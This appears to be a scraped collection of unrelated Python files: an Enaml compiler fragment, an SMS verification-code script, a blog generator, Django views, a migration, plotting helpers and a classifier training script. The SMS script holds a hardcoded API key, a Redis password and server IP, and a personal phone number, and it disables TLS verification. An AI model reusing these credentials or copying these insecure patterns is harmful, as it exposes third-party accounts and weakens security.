\"\"\" Initialize an EnamlCompiler.\n\n Parameters\n ----------\n filename : str\n The string filename of the module ast being compiled.\n\n \"\"\"\n self.filename = filename\n self.code_ops = []\n self.extend_ops = self.code_ops.extend\n\n def visit_Module(self, node):\n \"\"\" The Module node visitor method.\n\n This visitor dispatches to all of the body nodes of the module.\n\n \"\"\"\n visit = self.visit\n for item in node.body:\n visit(item)\n\n def visit_Python(self, node):\n \"\"\" The Python node 
visitor method.\n\n This visitor adds a chunk of raw Python into the module.\n\n \"\"\"\n py_code = compile(node.py_ast, self.filename, mode='exec')\n bp_code = Code.from_code(py_code)\n # Skip the SetLineno and ReturnValue codes\n self.extend_ops(bp_code.code[1:-2])\n\n def visit_Declaration(self, node):\n \"\"\" The Declaration node visitor.\n\n This generates the bytecode ops which create a new type for the\n enamldef and then adds the user defined attributes and events.\n It also dispatches to the DeclarationCompiler which will create\n the builder function for the new type.\n\n \"\"\"\n name = node.name\n extend_ops = self.extend_ops\n filename = self.filename\n func_code = DeclarationCompiler.compile(node, filename)\n extend_ops([\n (SetLineno, node.lineno),\n (LOAD_NAME, '_make_enamldef_helper_'), # Foo = _make_enamldef_helper_(name, base, buildfunc)\n (LOAD_CONST, name),\n (LOAD_NAME, node.base),\n (LOAD_CONST, func_code),\n (MAKE_FUNCTION, 0),\n (CALL_FUNCTION, 0x0003),\n (STORE_NAME, name),\n ])\n\n # We now have a new Declarative subclass stored at 'name' to\n # which we need to add any user defined attributes and events.\n extend_ops([\n (LOAD_NAME, name),\n (LOAD_ATTR, '_add_user_attribute'),\n ])\n\n # Dispatch to add any class-level info contained within the\n # declaration body. Visit nonstrict since not all child nodes\n # are valid at the class-level. The '_add_user_attribute'\n # class method is left on the top of the stack and popped\n # at the end of the visitors.\n visit = self.visit_nonstrict\n for child_node in node.body:\n visit(child_node)\n\n extend_ops([(POP_TOP, None)])\n\n def visit_AttributeDeclaration(self, node):\n \"\"\" Creates the bytecode ops for an attribute declaration.\n\n This will add the ops to add the user attrs and events to\n the new type.\n\n \"\"\"\n attr_type = node.type or 'object'\n self.extend_ops([\n (SetLineno, node.lineno),\n (DUP_TOP, None), # cls._add_user_attribute(name, type, is_event)\n (LOAD_CONST, node.name),\n (LOAD_NAME, attr_type),\n (LOAD_CONST, node.is_event),\n (CALL_FUNCTION, 0x0003),\n (POP_TOP, None),\n ])\n\n", "sub_path": "enaml/core/enaml_compiler.py", "file_name": "enaml_compiler.py", "file_ext": "py", "file_size_in_byte": 24330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itertools.count", "line_number": 115, "usage_type": "call"}, {"api_name": "types.CodeType", "line_number": 124, "usage_type": "call"}, {"api_name": "byteplay.LOAD_GLOBAL", "line_number": 156, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 157, "usage_type": "name"}, {"api_name": "byteplay.STORE_NAME", "line_number": 176, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 178, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 180, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 181, "usage_type": "name"}, {"api_name": "byteplay.DELETE_NAME", "line_number": 182, "usage_type": "name"}, {"api_name": "byteplay.DELETE_FAST", "line_number": 183, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 205, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 205, "usage_type": "name"}, {"api_name": "ast.walk", "line_number": 230, "usage_type": "call"}, {"api_name": "ast.Global", "line_number": 231, "usage_type": "attribute"}, {"api_name": "byteplay.Code.from_code", "line_number": 234, "usage_type": "call"}, {"api_name": "byteplay.Code", 
"line_number": 234, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 260, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 260, "usage_type": "name"}, {"api_name": "code_tracing.inject_tracing", "line_number": 263, "usage_type": "call"}, {"api_name": "byteplay.Code.from_code", "line_number": 288, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 288, "usage_type": "name"}, {"api_name": "code_tracing.inject_inversion", "line_number": 291, "usage_type": "call"}, {"api_name": "byteplay.Code.from_code", "line_number": 320, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 320, "usage_type": "name"}, {"api_name": "code_tracing.inject_tracing", "line_number": 326, "usage_type": "call"}, {"api_name": "code_tracing.inject_inversion", "line_number": 330, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 415, "usage_type": "call"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 457, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 458, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 459, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 460, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 461, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 466, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 467, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 468, "usage_type": "name"}, {"api_name": "byteplay.STORE_SUBSCR", "line_number": 469, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 477, "usage_type": "name"}, {"api_name": "byteplay.RETURN_VALUE", "line_number": 478, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 510, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 511, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 512, "usage_type": "name"}, {"api_name": "byteplay.BINARY_SUBSCR", "line_number": 513, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 514, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 515, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 516, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 517, "usage_type": "name"}, {"api_name": "byteplay.DUP_TOP", "line_number": 518, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 519, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 520, "usage_type": "name"}, {"api_name": "byteplay.ROT_TWO", "line_number": 521, "usage_type": "name"}, {"api_name": "byteplay.STORE_ATTR", "line_number": 522, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 523, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 524, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 525, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 529, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 530, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 531, "usage_type": "name"}, {"api_name": "byteplay.BINARY_SUBSCR", "line_number": 532, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 533, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 534, "usage_type": "name"}, 
{"api_name": "byteplay.LOAD_CONST", "line_number": 535, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 536, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 537, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 538, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 539, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 554, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 555, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 556, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 557, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 558, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 563, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 564, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 565, "usage_type": "name"}, {"api_name": "byteplay.STORE_SUBSCR", "line_number": 566, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 602, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 609, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 609, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 618, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 618, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 622, "usage_type": "name"}, {"api_name": "byteplay.RETURN_VALUE", "line_number": 623, "usage_type": "name"}, {"api_name": "byteplay.Code", "line_number": 627, "usage_type": "call"}, {"api_name": "byteplay.Code.from_code", "line_number": 662, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 662, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 680, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 681, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 682, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 683, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 684, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 685, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 686, "usage_type": "name"}, {"api_name": "byteplay.STORE_NAME", "line_number": 687, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 693, "usage_type": "name"}, {"api_name": "byteplay.LOAD_ATTR", "line_number": 694, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 706, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 717, "usage_type": "name"}, {"api_name": "byteplay.DUP_TOP", "line_number": 718, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 719, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 720, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 721, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 722, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 723, "usage_type": "name"}]} +{"seq_id": "306316870", "text": "import json\nimport random\nimport re\n\nimport redis\nimport requests\n\nTEL_PATTERN = re.compile(r'1[3-9]\\d{9}')\n\n\ndef send_messag(tel, code):\n resp = requests.post(\n 
url='http://sms-api.luosimao.com/v1/send.json',\n auth=('api', 'key-8aa189224438080c6c41286ea3df5aaf'),\n data={\n 'mobile': tel,\n 'message': f'Your SMS verification code is {code}. Never share it with anyone!【Python小课】'\n },\n timeout=3,\n verify=False\n )\n return json.loads(resp.text)\n\n\ndef main():\n tel = input('Please enter your mobile number: ')\n if TEL_PATTERN.fullmatch(tel):\n client = redis.Redis(host='120.77.222.217',\n port=6379,\n password='1qaz2wsx')\n if client.exists(tel):\n print('Please do not request another SMS verification code within 120 seconds!!!')\n else:\n code = ''.join(random.choices('0123456789', k=6))\n result = send_messag(tel, code)\n print(result['error'])\n if result['error'] == 0:\n client.set(tel, code, ex=120)\n print('Sent successfully!!!')\n else:\n print('Please enter a valid mobile number!!!')\n code = ''.join(random.choices('0123456789', k=6))\n send_messag('13114109737', code)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "数据库文档/code/example08.py", "file_name": "example08.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 12, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "redis.Redis", "line_number": 28, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 34, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "98303603", "text": "import pickle\nimport os\nimport json\nimport jinja2\n\ndef get_template():\n with open(\"template.html\") as handle:\n template = handle.read()\n return template\n\ndef get_cur_folder():\n return os.path.split(\n os.path.realpath(__file__)\n )[0]\n\ndef read_json():\n with open(get_cur_folder()+\"/config/config.json\",'r+') as handle:\n config = json.load(handle)\n return config\n\ndef write_html(doc):\n with open(get_cur_folder()+\"/assets/index.html\",\"w+\") as handle:\n handle.write(doc)\n return True\n\ndef make_html():\n config = read_json()\n doc = jinja2.Template(get_template()).render(\n title=config['meta']['title'],\n footer=config['meta']['footer'],\n about=config['meta']['about']\n )\n return write_html(doc)\n\nmake_html()\n", "sub_path": "init_blog.py", "file_name": "init_blog.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.split", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "572730184", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import View, ListView\nfrom sellers.models import Seller\nfrom products.models import Product\n\n\nclass DashboardView(View):\n def get(self, request, *args, **kwargs):\n sellers = Seller.objects.order_by('presentation_name')[:5]\n products = Product.objects.order_by('name')[:5]\n return render(request, \"common/dashboard.html\",\n {\"sellers\": sellers,\n \"products\": products})\n\n\ndef success_view(request):\n return HttpResponse(\"success\")\n\n\nclass FilteredListView(ListView):\n def 
get_filter_queryset(self, queryset, q):\n raise NotImplementedError\n\n def get_queryset(self):\n self.q = self.request.GET.get('q')\n if self.q:\n return self.get_filter_queryset(super().get_queryset(), self.q)\n return super().get_queryset()\n\n def get_context_data(self, **kwargs):\n if self.q:\n kwargs['q'] = self.q\n return super().get_context_data(**kwargs)\n", "sub_path": "apps/common/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.views.generic.View", "line_number": 8, "usage_type": "name"}, {"api_name": "sellers.models", "line_number": 10, "usage_type": "name"}, {"api_name": "sellers.models.Seller.objects.order_by", "line_number": 10, "usage_type": "call"}, {"api_name": "sellers.models.Seller.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sellers.models.Seller", "line_number": 10, "usage_type": "name"}, {"api_name": "products.models", "line_number": 11, "usage_type": "name"}, {"api_name": "products.models.Product.objects.order_by", "line_number": 11, "usage_type": "call"}, {"api_name": "products.models.Product.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "products.models.Product", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "sellers.models", "line_number": 13, "usage_type": "name"}, {"api_name": "products.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "599363055", "text": "\"\"\"empty message\n\nRevision ID: 92b82850b5c3\nRevises: 2258727bf914\nCreate Date: 2020-05-14 17:54:02.111660\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '92b82850b5c3'\ndown_revision = '2258727bf914'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('catalog', sa.Column('end_point', sa.BOOLEAN(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('catalog', 'end_point')\n # ### end Alembic commands ###\n", "sub_path": "migrations/ozon/versions/92b82850b5c3_.py", "file_name": "92b82850b5c3_.py", "file_ext": "py", "file_size_in_byte": 660, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "569405270", "text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef draw_network_inputs(images):\n plt.imshow(np.transpose(images.tensors[0].cpu().detach().numpy()/255 + 0.5, (1, 2, 0)))\n plt.show()\n\n plt.imshow(np.transpose(images.tensors[1].cpu().detach().numpy() / 255 + 0.5, (1, 2, 0)))\n plt.show()\n\n plt.imshow(np.transpose(images.tensors[2].cpu().detach().numpy() / 255 + 0.5, (1, 2, 0)))\n plt.show()\n\n\ndef plot_inference_for_image(predictor, image_path):\n image = cv2.imread(image_path)\n result = predictor.run_on_opencv_image(image)\n\n plt.imshow(result)\n plt.show()", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 603, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.pyplot.imshow", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "382212099", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom scipy.io import arff\nimport csv\nimport pickle\n\nfrom train import trainClassifiers, performSystematicExperiments, plotLosses\n\ndef plotAccuracyForClassifiers(X, y):\n # save cross validation results to .csv\n cv_results = performSystematicExperiments(X, y)\n 
saveResultsTo_csv(cv_results, optimized=False)\n\n accuracies = [value for value in cv_results.values()]\n plt.figure(figsize=(15, 10))\n plt.title(\"Cross-validation accuracy for all models\")\n plt.ylabel(\"Classification Accuracy\")\n plt.xlabel(\"Models\")\n plt.boxplot(accuracies, showmeans=True, notch=False)\n plt.xticks(range(1, len(cv_results.keys()) + 1), cv_results.keys(), rotation='horizontal')\n plt.show()\n\n\ndef pickleDictionaryTo(results_dict, path=None):\n if path is None:\n path = ''\n f = open(path+\"optimization_results.pkl\",\"wb\")\n pickle.dump(results_dict, f)\n f.close()\n\n\ndef saveResultsTo_csv(results_dict, optimized=True):\n \"\"\"Saves the result of optimization or cross-validation to a .csv file\"\"\"\n fieldnames = []\n if optimized is True:\n filename = 'optimization_results.csv'\n fieldnames = ['Model', 'Accuracy', 'Best Params']\n else:\n filename = 'cross_validation_results.csv'\n fieldnames = ['model type', 'fold 1', 'fold 2', 'fold 3', 'fold 4', 'fold 5']\n csvfile = open(filename, 'w', newline='')\n writer = csv.DictWriter(csvfile, delimiter=',', fieldnames=fieldnames)\n writer.writeheader()\n if optimized is True:\n for key, value in zip(results_dict.keys(), results_dict.values()):\n print({'Model': key, 'Accuracy': value['accuracy'], 'Best Params': str(value['params'])})\n writer.writerow({'Model': key, 'Accuracy': value['accuracy'], 'Best Params': str(value['params'])})\n else:\n for key, value in zip(results_dict.keys(), results_dict.values()):\n row = {}\n row['model type'] = key\n for i in range(0, len(fieldnames)-1):\n row[fieldnames[i+1]] = value[i]\n writer.writerow(row)\n csvfile.close()\n\n\ndef getData(dataPath):\n \"\"\"Loads matrix of features X and vector of labels y given one .arff file\"\"\"\n\n fileName = \"{}/{}.music.arff\"\n dataset = None\n for i in range(6, 7):\n with open(fileName.format(dataPath,i), 'r') as f:\n # https://docs.scipy.org/doc/scipy/reference/generated/scipy.io.arff.loadarff.html\n ## Read arff\n data, meta = arff.loadarff(f)\n ## Convert to a dataframe\n print(fileName.format(dataPath,i))\n if dataset is None:\n dataset = pd.DataFrame(data)\n else:\n dataset = pd.concat([dataset, pd.DataFrame(data)], ignore_index=True)\n\n # Split into data and labels\n X = dataset.iloc[:, :-1].values\n y = np.array([1 if str(w, 'utf-8') == 'music' else 0 for w in dataset.iloc[:, -1]])\n return X, y\n\n\ndef main():\n dataPath = '../data/train_arff'\n print(\"Start Program\")\n X, y = getData(dataPath)\n# plotAccuracyForClassifiers(X, y)\n opt_results = trainClassifiers(X[:6000], y[:6000])\n saveResultsTo_csv(opt_results, optimized=True)\n best_params = opt_results['params'] #'RandomForest'\n from sklearn.manifold import TSNE\n from sklearn.decomposition import TruncatedSVD\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X[:6000], y[:6000], test_size=0.33, random_state=0)\n reducer = TruncatedSVD(n_components=50, random_state=0)\n X_train_reduced = reducer.fit_transform(X_train)\n X_test_reduced = reducer.transform(X_test)\n # reduce a second time to 2 features, because embedding takes more time\n reducer = TruncatedSVD(n_components=2, random_state=0)\n X_train_again_reduced = reducer.fit_transform(X_train_reduced)\n X_test_again_reduced = reducer.transform(X_test_reduced)\n embedder = TSNE(n_components=2, perplexity=40, verbose=2)\n X_train_embedded = embedder.fit_transform(X_train_reduced)\n embedder = TSNE(n_components=2, perplexity=40, verbose=2)\n X_test_embedded = 
embedder.fit_transform(X_test_reduced)\n print(\"X_train reduced: \", X_train_reduced.shape)\n print(\"X_test reduced: \", X_test_reduced.shape)\n print(\"X_train embedded: \", X_train_embedded.shape)\n print(\"X_test embedded: \", X_test_embedded.shape)\n \n from sklearn.ensemble import RandomForestClassifier\n # TODO: tune the parameters\n classifier = RandomForestClassifier(max_depth=10, max_features=2, n_estimators=100)\n classifier.fit(X_train[:, -3:-1], y_train)\n \n # Visualising the Training set results\n from matplotlib.colors import ListedColormap\n X_set, y_set = X_train[:, -3:-1], y_train\n X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),\n np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.50, cmap = ListedColormap(('red', 'green')))\n plt.scatter(X_set[y_set == 0, 0], X_set[y_set == 0, 1], c = 'red', label = 0)\n plt.scatter(X_set[y_set == 1, 0], X_set[y_set == 1, 1], c = 'green', label = 1)\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n# for i, j in enumerate(np.unique(y_set)):\n# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n# c = ListedColormap(('red', 'green'))(i), label = j)\n plt.title('Random Forest (Training set)')\n plt.xlabel('Reduced f01')\n plt.ylabel('Reduced f02')\n plt.legend()\n plt.show()\n \n # Visualising the Test set results because data is smaller here\n from matplotlib.colors import ListedColormap\n X_set, y_set = X_test[:, -3:-1], y_test\n X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),\n np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.50, cmap = ListedColormap(('red', 'green')))\n plt.scatter(X_set[y_set == 0, 0], X_set[y_set == 0, 1], c = 'red', label = 0)\n plt.scatter(X_set[y_set == 1, 0], X_set[y_set == 1, 1], c = 'green', label = 1)\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n# for i, j in enumerate(np.unique(y_set)):\n# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n# c = ListedColormap(('red', 'green'))(i), label = j)\n plt.title('Random Forest (Test set)')\n plt.xlabel('Reduced f01')\n plt.ylabel('Reduced f02')\n plt.legend()\n plt.show()\n \n# train_errors, val_errors, test_errors = plotLosses(opt_results, X, y)\n from sklearn.neural_network import MLPClassifier\n classifier = MLPClassifier(hidden_layer_sizes=(16, 16), activation='tanh',\n solver='adam', alpha=9.263406719097344e-05, learning_rate_init=0.0008804217040183917,\n random_state=0)\n classifier.fit(X_train[:,-3:-1], y_train)\n# 'hidden_layer_sizes': 16, 'alpha': 9.263406719097344e-05, 'learning_rate_init': 0.0008804217040183917, 'activation': 'tanh',\n# 'solver': 'adam', 'n_layers': 2}\n\nif __name__ == '__main__':\n main()", "sub_path": "Code/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "train.performSystematicExperiments", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.boxplot", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 30, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.io.arff.loadarff", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.io.arff", "line_number": 69, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "train.trainClassifiers", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 